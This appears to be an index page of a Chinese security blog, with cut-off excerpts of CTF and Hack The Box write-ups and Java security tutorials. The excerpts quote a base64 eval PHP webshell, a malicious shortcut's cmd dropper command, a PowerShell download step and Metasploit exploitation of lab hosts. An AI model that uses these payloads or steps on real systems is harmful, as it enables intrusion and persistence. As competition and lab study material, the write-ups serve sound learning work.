2022DASCTF Apr X FATE 防疫挑战赛 WriteUP 文章目录MiscSimpleFlowWebwarmup-phpsoeasy_phpMiscSimpleFlow看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包后面的包里面发现flag.zip但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量@eval(@base64_decode($_POST['m8f8d9db647ecd']));&e57fb9c067c677=o3&g479cf6f058c
[*CTF2022]oh_my_lotto_revenge New相对于oh_my_lotto,revenge进行了下面的更改这么做,我们能走的就只有RCE了,而这里唯一能操作的一个地方就是这里,可以操作环境变量os.environ[lotto_key] = lotto_value这里有几个非预期解,先看看预期解Intented writeup这里可以操控环境变量,那么我们能做的事情就很多了,预期解是操控HOSTALIASES修改hosts因为他的wget是通过域名下载的os.system('wget --content-disposition
[Hack The Box]靶机8 Optimum nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看打开是HFS,nmap扫出来是HFS2.3这个版本的HFS是有cve的https://nvd.nist.gov/vuln/detail/CVE-2014-6287msf有这个模块直接拿下shell拿到user.txt进不了admin,需要提权本地起一个python服务,把winpeas传上去powershell -c "(new-object System.Net.WebClient).Dow.
[Hack The Box]靶机6 Legacy && 靶机7 Blue 老规矩,namp一把嗦扫端口开启了139,445和3389,web都没开一个,那肯定得从其他方面下手了从namp结果看起来,貌似得从smb这里下手直接用nmap进行漏扫nmap --script=vuln 10.10.10.4这里都直接扫出来了,ms17-010,msf可以打的直接拿到shell权限也都是admin,直接拿下两个flag...
[Java安全]类加载器ClassLoader 前言借用了先知社区的文章的一张图来解释这个原理负责动态加载Java类到Java虚拟机的内存空间中,用于加载系统、网络或者其他来源的类文件。Java源代码通过javac编译器编译成类文件,然后JVM来执行类文件中的字节码来执行程序。类加载器介绍类加载器大致分为两类:JVM 默认类加载器用户自定义类加载器类加载器分类引导类加载器(BootstrapClassLoader):属于jvm一部分,不继承java.lang.ClassLoader类,也没有父加载器,主要负责加载核心java库(即
[Hack The Box]靶机4 Jerry 首先用nmap进行端口扫描,看到只开启了8080端口,是Tomcat给出的是默认界面dirmap扫描了一下目录去manager管理页面看看,他需要认证他提示密码为s3cret,试了一下真是这个,倒省事了,不用我自己爆破进tomcat的后台就好弄了哦,getshell方法多的是,这里写的挺多的,这里我选择直接用是msf打,方便点use exploit/multi/http/tomcat_mgr_upload直接打通在Administrator的桌面发现flagcd C:.
[Hack The Box]靶机2 Backdoor nmap先嗦一把,开了22端口、80端口和1337端口访问是一个wordpress博客网站wpscan扫一下版本是5.8.1再看看网站,这里会跳转backdoor.htb,配置一下hostsecho 10.10.11.125 backdoor.htb >> /etc/hosts扫一下目录这里有目录遍历这里有一个eBook-download的插件在readme里面看到版本信息,找找看有没有什么漏洞版本好像是1.1的确有漏洞,任意文件下载拿到一个数据库的.
[Hack The Box] 靶机1 Meow+Paper 前言久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干这次就算是对这个平台的一个熟悉操作吧Meow下载到了open文件,kali连接上然后测试一下可以ping通了然后就开nmap跑nmap -sV 10.129.160.90开启了23端口,telnet服务,直接连接,root账户直接拿flag这个算是白给的Paper下面就开始打正式的靶机了一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个
[HMGCTF2022]wp WEBFan website首先是一个www.zip的源码泄露,是laminas框架mvc的框架首先就是看路由在\module\Album\src\Controller\AlbumController.php里面有功能点<?phpnamespace Album\Controller;use Album\Model\AlbumTable;use Laminas\Mvc\Controller\AbstractActionController;use Laminas\View\Mode
[Java安全] 反射 前言准备入手学习java的安全了,感觉这也是一个大的趋势,想着尽早进入到java安全的探索中,在反序列化链的学习之前,需要先学习反射,不多说了,开干吧反射反射定义对象可以通过反射获取他的类,类可以通过反射拿到所有⽅法(包括私有)通过java语言中的反射机制可以操作字节码文件,可以读和修改字节码文件反射的基本运用1. 获取类对象a. forName()方法只需要知道类名,在加载JDBC的时候会采用实例代码public class test1 { public static voi
[SCTF2021]Upload_it_1复现闭包组件反序列化rce 题目地址SycloverTeam提供了题目的docker环境https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1wp首先题目给了composer.json{ "name": "sctf2021/upload", "authors": [ { "name": "AFKL", "email": "upload@qq.com"
[HWS&DasCTF]misc babypdf附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的看一下目标%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr
[Java多线程]线程创建的三种方式,线程的互斥,线程的同步 前言多线程:指的是这个程序(一个进程)运行时产生了不止一个线程并行和并发:并行:多个cpu实例或者多台机器同时执行一段处理逻辑,是真正的同时。并发:通过cpu调度算法,让用户看上去同时执行,实际上从cpu操作层面不是真正的同时。并发往往在场景中有公用的资源,那么针对这个公用的资源往往产生瓶颈,我们会用TPS或者QPS来反应这个系统的处理能力。线程创建最基础的主要分为两种方法继承Thread类实现Runnable接口创建Thread类的子类,用这种方法生成新线程,可以按以下步骤进行:
[2021极客大挑战]部分wp Where_is_my_FUMO开局是给了一个反弹shell的命令执行<?phpfunction chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_list, "", $str);}if (isset($_GET['DATA'])) { $data = $_GET['DATA']; $add
[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析 前言漏洞存在版本,分为两大版本:ThinkPHP 5.0-5.0.24ThinkPHP 5.1.0-5.1.30环境搭建composer create-project topthink/think=5.0.5 thinkphp5.0.5 --prefer-dist修改composer.json"require": { "php": ">=5.4.0", "topthink/framework": "5.0.5"},执行composer update